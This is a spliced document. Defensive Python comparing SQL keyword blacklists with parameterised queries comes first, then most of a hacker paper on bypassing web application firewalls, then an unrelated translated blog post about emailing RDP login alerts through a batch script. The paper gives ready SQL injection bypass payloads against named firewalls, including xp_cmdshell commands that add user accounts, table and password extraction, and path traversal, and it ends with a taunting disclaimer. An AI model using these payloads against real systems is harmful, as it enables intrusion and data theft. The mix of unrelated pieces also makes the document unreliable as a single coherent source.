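    """True when the black-list filter would refuse this input."""
    return KEYWORD_BLACKLIST.search(value) is not None


def setup_db():
    """Constructed in-memory table standing in for the page's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "andrew"), (3, "orlando")])
    return conn


def find_user_safe(conn, name):
    """Parameterised lookup: the input is bound as a value, never parsed as SQL,
    so no keyword list is needed and 'andrew' is a perfectly good username."""
    return [row[0] for row in conn.execute("SELECT user FROM users WHERE user = ?", (name,))]


def parse_user_id(value):
    """Allowlist for a numeric id: accept digits only, reject everything else."""
    return int(value) if value.isdigit() else None


def find_user_by_id(conn, value):
    """Numeric lookup guarded by the allowlist and still bound as a parameter."""
    user_id = parse_user_id(value)
    if user_id is None:
        return []
    return [row[0] for row in conn.execute("SELECT user FROM users WHERE user_id = ?", (user_id,))]
```

The black list blocks the legitimate names "andrew" and "Orlando" (they contain "and" and "or") yet passes the page's `1 || 1 = 1`, which contains no listed word at all; the parameterised lookup returns nothing for that string because it is compared as a literal username, and the integer allowlist rejects it before any query is built.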


	+++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01b] - Bypass Regular Expression Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++

		Regular expression filtering is a better solution for preventing SQL injection than keyword and function filtering because it uses pattern matching to detect attacks, so legitimate users can submit more flexible input to the server.
	However, many regular expressions can also be bypassed. The following examples illustrate injection scripts used to bypass the regular expressions in the open-source PHPIDS 0.6.

	PHPIDS generally blocks input containing =, ( or ' followed by a string or integer, e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed with a statement that does not contain the =, ( or ' symbols.

	[Code]---------------------------------------------------------------		
	filtered injection:		1 or 1 = 1
	Bypassed injection:		1 or 1
	[End Code]----------------------------------------------------------- 

	[Code]---------------------------------------------------------------		
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name = 'users'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
	Bypassed injection:		1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
	Bypassed Injection:		1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
	[End Code]----------------------------------------------------------- 



########################################
 [0x02] - Normally Bypassing Techniques
########################################

	In this section we describe techniques to bypass a Web Application Firewall (WAF). First you need to know what a WAF is.
	
	A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application,
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
	WAFs are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/web service layers.
Some modern WAF systems work with both attack signatures and abnormal behaviour.

	Now let's look at how to breach one with obfuscation. Any WAF can be bypassed given the time to understand its rules, or with some imagination!

	
	1. Bypass with Comments

		SQL comments allow us to bypass a lot of filtering and WAFs.
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
		[End Code]-----------------------------------------------------------


	2. Case Changing

		Some WAFs filter only lowercase SQL keywords.

		Regex Filter: /union\sselect/g
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UnIoN/**/Select/**/1,2,3--
		[End Code]-----------------------------------------------------------


	3. Replaced keywords

		Some applications and WAFs use preg_replace to remove all SQL keywords, so we can bypass them easily.
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
		[End Code]-----------------------------------------------------------

		In some cases the SQL keyword is filtered out and replaced with whitespace, so we can use "%0b" to bypass.

		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
		[End Code]-----------------------------------------------------------

		With mod_rewrite, the comment "/**/" cannot be used to bypass, so we use "%0b" in place of "/**/".

		Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
		Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
	


	4. Character encoding

		Most CMSs and WAFs decode and then filter application input, but some WAFs decode the input only once, so
		double encoding can bypass certain filters: the WAF decodes the input once and filters it, while the application
		keeps decoding the SQL statement before executing it.
	
		[Code]-----------------------------------------------------------------------------------------------------------------
		http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
		[End Code]-------------------------------------------------------------------------------------------------------------
				
		Moreover, these techniques can be combined to bypass Citrix NetScaler:
			- Remove all "NULL" words
			- Use query encoding in some parts
			- Remove the single quote character "'"
			- And have fun !!
			Credit: Wendel Guglielmetti Henrique
		
		And "Armorlogic Profense" prior to 2.4.4 was bypassed with a URL-encoded newline character.


		#Real World Example
		
		1. NukeSentinel (Nuke Evolution)
		
		[Nukesentinel.php Code]------------------------------------------------------------
		// Check for UNION attack
		// Copyright 2004(c) Raven PHP Scripts
		$blocker_row = $blocker_array[1];
		if($blocker_row['activate'] > 0) {
		  if (stristr($nsnst_const['query_string'],'+union+') or
		      stristr($nsnst_const['query_string'],'%20union%20') or
		      stristr($nsnst_const['query_string'],'*/union/*') or
		      stristr($nsnst_const['query_string'],' union ') or
		      stristr($nsnst_const['query_string_base64'],'+union+') or
		      stristr($nsnst_const['query_string_base64'],'%20union%20') or
		      stristr($nsnst_const['query_string_base64'],'*/union/*') or
		      stristr($nsnst_const['query_string_base64'],' union ')) {  // block_ip($blocker_row);
		    die("BLOCK IP 1 " );
		  }
		}
		[End Code]-------------------------------------------------------------------------

		We can bypass their filtering with these requests:
		
		Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
		Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
		Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


		2. Mod Security CRS (Credit: Johannes Dahse)
		
		[SecRule]--------------------------------------------------------------------------
		SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
		t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
		msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
		tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
		setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
		setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
		[End Rule]-------------------------------------------------------------------------

		We can bypass their filtering with this request:
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
		[End Code]--------------------------------------------------------------------------

		With this attack we can bypass the Mod Security rule. Let's see what happens!
		
		MySQL Server supports 3 comment styles:
			- From a "#" character to the end of the line
			- From a "--" sequence to the end of the line
			- From a /* sequence to the following */ sequence, as in the C programming language.
			  This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
			  not be on the same line.

		In the following example we used "%0D%0A" as the newline characters. Let's take a look at the first request (to extract the DB user).
		The resulting SQL payload looked something like this:

			0 div 1 union#foo*/*/bar
			select#foo
			1,2,current_user
		
		However the SQL payload, when executed by the MySQL DB, looked something like this:

			0 div 1 union select 1,2,current_user	


	5. Buffer Overflow

		WAFs written in the C language are prone to overflows, or behave differently, when loaded with a large amount of data.
		Sending a large amount of data lets our code through to be executed.
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
		414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
		[End Code]--------------------------------------------------------------------------

	
	6. Inline Comments (Mysql Only)

		From the MySQL 5.0 Reference Manual: MySQL Server supports some variants of C-style comments. These enable you to write
		code that includes MySQL extensions, but is still portable, by using comments of the following form:

		/*! MySQL-specific code */
		
		In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
		but other SQL servers will ignore the extensions.
		
		A lot of WAFs filter SQL keywords with patterns like /union\sselect\ig. We can bypass such a filter by using inline comments.
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1/*!UnIoN*/Select+1,2,3--
		[End Code]--------------------------------------------------------------------------
		
		Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can
		add more inline comments:
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=/*!UnIoN*/+/*!Select*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
		/*!Where*/+/*!TaBlE_sChEMa*/+like+database()--
		[End Code]--------------------------------------------------------------------------

		In a recent penetration test, we were able to bypass a Mod Security CRS and PentaSecurity-WAPPLE using this technique. More information is shown below:
		
		#################################################################################################################

		Vendor : Penta Security System
		Product: Wapple Web Application Firewall
		Patch released: 2011-10-02 (In SQL Injection Custom Policy Mode)
		Publish released: 2011-10-04
		Credit : Prathan Phongthiproek and Suphot Boonchamnan
	
		These scripts can bypass all SQL Injection rules:
			1 ||1=1
			1 /*!order by*/ 3
			1 /*!union select*/ 1,table_name from /*!information_schema.tables*/
			1 /*!union select*/ 1,column_name from /*!information_schema.columns where table_name = 0x7573657273*/
			1 /*!union select*/ /*!user,password*/ from /*!users*/
		################################################################################################################
		

	
########################################	
 [0x03] - Advanced Bypassing Techniques
########################################
		
	In this section we present two techniques, "HTTP Parameter Pollution: Split and Join" and "HTTP Parameter Contamination".
	These techniques can bypass a lot of open-source and commercial web application firewalls (WAFs).
     
     
	++++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x03a] - HTTP Parameter Pollution: Split and Join
	++++++++++++++++++++++++++++++++++++++++++++++++++++

		HTTP Parameter Pollution (HPP) is a new class of injection vulnerability described by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
	effective hacking technique. An HPP attack can be defined as the ability to override or add HTTP GET/POST parameters by injecting into the
	query string.

	Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

	HTTP Parameter Handling: (Example)
	
	+------------------------------------------------------------------+
	| Web Server 	  | Parameter Interpretation	 | Example	   |
	+------------------------------------------------------------------+
	| ASP.NET/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| ASP/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| PHP/Apache	  | The last param is resulting  | par1=val2	   |
	| JSP/Tomcat	  | The first param is resulting | par1=val1	   |
	| Perl/Apache	  | The first param is resulting | par1=val1	   |
	| DBMan		  | Concatenation by two tildes  | par1=val1~~val2 |
	+------------------------------------------------------------------+
	
		What would happen with WAFs that parse the query string before applying their filters? (HPP can be used even to bypass WAFs.)
	Some loose WAFs may analyze and validate a single parameter occurrence only (the first or the last one). Whenever the target environment concatenates
	multiple occurrences (ASP, ASP.NET, DBMan, ...) an attacker can split the malicious payload across them.

		In a recent penetration test (again), we were able to bypass an Imperva SecureSphere using "HPP+Inline Comment" in an ASP/ASP.NET environment.
	This technique can bypass other commercial WAFs too. More information about "HPP+Inline Comment" is shown below:

	
	#Real World Example:

	1. Mod Security CRS (Credit: Lavakumar Kuppan)
		
		The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.

		Bypassed : http://victim.com/search.aspx?q=select name&q=password from users

		
		Let's see what happens. ModSecurity's interpretation is:
		
		q=select name
		q=password from users

		ASP/ASP.NET's interpretation is
		q=select name,password from users

		*Tip: This attack can be carried out on a POST variable in a similar way


	2. Commercial WAFs
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users

		
		Analyzing it, the WAF's interpretation is:

		q=select/*
		q=*/name
		q=password/*
		q=*/from/*
		q=*/users
		
		ASP/ASP.NET's interpretation is
		q=select/*,*/name,password/*,*/from/*,*/users
		q=select name,password from users


	3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)
		
		Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --

		
		Analyzing it, the WAF's interpretation is:

		id=1’; /*
		id=1*/ EXEC /*
		id=1*/ master..xp_cmdshell /*
		id=1*/ “net user zeq3ul UrWaFisShiT” /*
		id=1*/ --
		
		ASP/ASP.NET's interpretation is
		id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
		id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --
		

		The easiest mitigation for this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request.
	This would prevent all variations of this attack.
		However, this might not be possible in all cases, as some applications have a legitimate need for duplicate parameters
	and are designed to send and accept multiple HTTP parameters of the same name in the same request. To protect these applications the WAF
	should also interpret the HTTP request in the same way the web application would.

		
	++++++++++++++++++++++++++++++++++++++++
	 [0x03b] - HTTP Parameter Contamination
	++++++++++++++++++++++++++++++++++++++++

		The original idea of HTTP Parameter Contamination (HPC) comes from the innovative approach of the HPP research: exploring deeper
	and exploiting strange behaviours in web server components, web applications and browsers that result from contaminating query-string
	parameters with reserved or unexpected characters.
	
	Some facts:
	- The term Query String is commonly used to refer to the part between the "?" and the end of the URI
	- As defined in RFC 3986, it is a series of field-value pairs
	- Pairs are separated by "&" or ";"
	- RFC 2396 defines two classes of characters:
		Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
		Reserved  : ; / ? : @ & = + $ ,
		Unwise    : { } | \ ^ [ ] `

		Different web servers have different logic for processing specially crafted requests. There are more web server, back-end platform and special character combinations,
	but we will stop here this time.

	Query string and Web server response (Example)
	
	+-----------------------------------------------------------+
	| Query String	  |    Web Servers response / GET values    |
	+-----------------------------------------------------------+
	| 		  | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP	    |
	+-----------------------------------------------------------+
	| ?test[1=2	  | test_1=2	 	     | test[1=2	    |
	| ?test=%  	  | test=%		     | test=	    |
	| ?test%00=1	  | test=1	       	     | test=1	    |
	| ?test=1%001	  | NULL		     | test=1	    |
	| ?test+d=1+2	  | test_d=1 2		     | test d=1 2   |
	+-----------------------------------------------------------+
	
	The magic character "%" and its effect on ASP/ASP.NET:

	+--------------------------------------------------------------------+
	| 	Keywords     |        WAF   		  |  ASP/ASP.NET     |
	+--------------------------------------------------------------------+
	| sele%ct * fr%om..  | sele%ct * fr%om.. 	  | select * from..  |
	| ;dr%op ta%ble xxx  | ;dr%op ta%ble xxx	  | ;drop table xxx  |
	| <scr%ipt>	     | <scr%ipt>		  | <script>	     |
	| <if%rame>	     | <if%rame>		  | <iframe>         |
	+--------------------------------------------------------------------+


	#Real world examples:

	1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf) 

		[Filtered]----------------------------------------------------------------------------------
	
		[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b" 
		at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"] 
		[rev "2.2.0"] [msg 	"Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] 
		[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]

		[End Filtered]------------------------------------------------------------------------------

		Forbidden: http://localhost/?xp_cmdshell
		Bypassed : http://localhost/?xp[cmdshell

	2. Bypass URLScan 3.1 DenyQueryStringSequences rule
	
		Forbidden: http://localhost/test.asp?file=../bla.txt
		Bypassed : http://localhost/test.asp?file=.%./bla.txt

	3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)

		Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
		Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

		In this situation WebKnight relies on SQL keyword filtering. When we use "HTTP Parameter Contamination" by inserting "%" into the SQL keywords, the WAF is bypassed
		and the web server receives the command "id=10 and 1=0/(select top 1 table_name from information_schema.tables)", because a stray "%" is a cutter (it is dropped) on the web server.
	

		These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
	Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviours.
		HPC can be used to extend an HPP attack by spoofing the real parameter name in the QUERY_STRING with the "%" character on an IIS/ASP platform,
	if a WAF blocks that kind of attack.
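To act on the two HPC tables above, a WAF has to decode each parameter the way the back end behind it will, before any keyword rule runs. The Python below is an added example, not from the paper or from any vendor: asp_view and php_view emulate the IIS6/ASP and Apache/PHP columns of the tables (stray "%" dropped versus kept, NUL truncation, PHP's name mangling), and waf_decision applies a small blocklist to that decoded view instead of to the raw bytes. The function names and the blocklist are my assumptions; the query strings exercised are the ones quoted in this section.

```python
import re

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")

# Small blocklist standing in for the WAF rules named in the paper (assumed).
BLOCKED = re.compile(r"\bselect\b|\bxp_cmdshell\b|\.\./", re.I)


def _decode(token, keep_stray_percent):
    """Percent-decode one raw query-string token. '+' becomes a space. A '%' that is
    not followed by two hex digits is kept literally (PHP) or dropped (IIS/ASP, the
    'cutter' behaviour shown in the tables)."""
    out, i = [], 0
    while i < len(token):
        ch = token[i]
        if ch == "%" and HEX_PAIR.match(token, i + 1):
            out.append(chr(int(token[i + 1:i + 3], 16)))
            i += 3
        elif ch == "%":
            if keep_stray_percent:
                out.append("%")
            i += 1
        elif ch == "+":
            out.append(" ")
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def asp_view(raw_query):
    """Parameters as IIS6/ASP hands them to the application, per the paper's table:
    stray '%' vanishes and a decoded NUL terminates both name and value."""
    params = {}
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        name = _decode(name, keep_stray_percent=False).split("\x00")[0]
        value = _decode(value, keep_stray_percent=False).split("\x00")[0]
        params[name] = value
    return params


def php_view(raw_query):
    """Parameters as Apache/PHP hands them to the application, per the same table:
    stray '%' stays literal, a NUL in the name truncates it, a NUL in the value makes
    the parameter NULL (modelled as None), and '.', ' ' and an unmatched '[' in a
    name are mangled to '_'."""
    params = {}
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        name = _decode(name, keep_stray_percent=True).split("\x00")[0]
        name = re.sub(r"[. ]", "_", name)
        if "[" in name and "]" not in name:
            name = name.replace("[", "_", 1)
        value = _decode(value, keep_stray_percent=True)
        params[name] = None if "\x00" in value else value
    return params


def raw_check(raw_query):
    """The weak behaviour from the 'WAF' column: match the undecoded bytes."""
    return bool(BLOCKED.search(raw_query))


def waf_decision(raw_query, backend_view):
    """Match the blocklist against what the given back end will see.
    Returns the names of the offending parameters."""
    hits = []
    for name, value in backend_view(raw_query).items():
        if BLOCKED.search(name) or (value is not None and BLOCKED.search(value)):
            hits.append(name)
    return sorted(hits)


if __name__ == "__main__":
    q = "file=.%./bla.txt"
    print("raw bytes :", raw_check(q))                 # False
    print("ASP view  :", asp_view(q), waf_decision(q, asp_view))   # {'file': '../bla.txt'} ['file']
    print("PHP view  :", php_view(q), waf_decision(q, php_view))   # {'file': '.%./bla.txt'} []
```

The same query string can therefore be harmless for one back end and a traversal or injection for another, which is why a WAF that only knows the raw bytes, or assumes one platform's decoding for all, ends up in the "Bypassed" column.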

	

######################################	
 [0x04] - How to protect your website
######################################

- Implement a Software Development Life Cycle (SDLC)
- Secure coding: validate all inputs and outputs
- PenTest before going online
- Harden it !!
- Revisit the PenTest
- Deploy a WAF (optional)
- Always check for WAF patches


#####################	
 [0x05] - Conclusion
#####################
 
- WAFs are not the long-expected
- Because of its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt the WAF filters to the particular web app being protected
- A WAF doesn't eliminate a vulnerability, it just partly screens the attack vector


#####################
 [0x06] - References
#####################

[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com


####################
 [0x07] - Greetz To
####################
	
Greetz	    :  ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx :  Exploit-db.com


				----------------------------------------------------
		Our disclosure purpose isn't to help security products but to reveal their shit. 
		   Security products are not able to protect 100% from an admin's damn config/coding. 
				  It just takes time and imagination to breach it !!
				----------------------------------------------------

Automatically monitoring Terminal Services logins on a Windows 2003 server in real time

A friend's Windows server was hacked, and the attacker also maliciously deleted some data backups. I helped harden it, and since the server is managed entirely through Windows Terminal Services, I looked for a way to monitor its logins. With blat, a small command-line tool for sending e-mail, plus a batch file, I put together a simple monitoring program: when someone logs in through Terminal Services and succeeds, the IP address of the person logging in is sent to a specified mailbox.

1. First download blat and extract it to the C:\blat directory.

2. Create a new .bat file in any directory; mine is mail.bat, with the following content:

 

@echo off
:: record when the login happened and which addresses are connected to the RDP port (3389)
date /t >mail.txt
time /t >>mail.txt
netstat -n -p tcp | find "3389" >>mail.txt
:::::::::::::: config::::::::::::::
set from=Neeao.com@126.com
set user=neeao.com
set pass=neeao.com
set to=neeao.com@qq.com
set subj=3389
set mail=mail.txt
set server=smtp.126.com
set debug=-debug -log blat.log -timestamp
::::::::::::::::: run blat :::::::::::::::::
C:\blat\full\blat.exe %mail% -to %to% -base64 -charset Gb2312 -subject %subj%  -server %server% -f %from% -u %user% -pw %pass% %debug%
:: this script is started in place of the shell (see step 3), so bring up the desktop afterwards
start Explorer

Very simple: the batch file first finds out which IP is connected to port 3389 on this machine, then e-mails it to the specified mailbox.

3. Go to Control Panel -> Administrative Tools -> Terminal Services Configuration -> RDP-Tcp -> Properties -> Environment -> "Start the following program when the user logs on"; under "Program path and file name" enter "C:\mail.bat" and under "Start in" enter "C:\". That's it.

4. Log off and log back on to see whether the e-mail arrives. If something goes wrong and the desktop does not appear, press Ctrl+Alt+End to bring up Task Manager and launch the desktop from there.

5. One small bug found so far: a cmd window pops up at login.

6. If you enable SMS notification for the mailbox, or use a 139 mailbox, you can get real-time SMS notifications on your phone; try it if you are interested.

References:

0. http://hi.baidu.com/testvbpro/blog/item/5e8aa9c7efb063d1d1006084.html
1. http://xuyafei202.blog.163.com/blog/static/2798837320105107550913/